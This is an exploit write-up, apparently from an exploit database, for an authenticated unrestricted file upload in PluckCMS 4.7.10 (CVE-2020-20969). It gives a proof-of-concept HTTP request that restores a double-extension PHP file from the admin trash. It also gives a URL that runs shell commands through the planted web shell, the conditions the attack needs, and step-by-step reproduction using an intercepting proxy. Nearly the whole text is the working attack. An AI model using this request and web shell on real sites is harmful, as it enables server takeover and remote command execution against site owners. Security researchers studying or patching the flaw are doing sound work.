# Exploit Title: PluckCMS 4.7.10 - Unrestricted File Upload
# Date: 2025-11-25
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/pluck-cms/pluck/
# Software Link: https://github.com/pluck-cms/pluck/
# Version: 4.7.10
# Tested on: Windows
# CVE : CVE-2020-20969
Proof Of Concept
GET /admin.php?action=trash_restoreitem&var1=exploit.php.jpg&var2=file HTTP/1.1
Host: pluck
Cookie: PHPSESSID=[valid_session_id]
**Access Method:**
http://pluck/files/exploit_copy.php?cmd=id
**Additional Conditions:**
1. Valid session cookie required (authenticated attack)
2. File `exploit.php.jpg` must exist in `data/trash/files/` before restoration
3. Server must not filter double extensions during file upload/trash operations
Steps to Reproduce
Log in as an admin user.
Intercept and send the malicious request using a web proxy tool such as Burp Suite, ensure it includes a valid session cookie.
The file will be restored and can be accessed through the url.
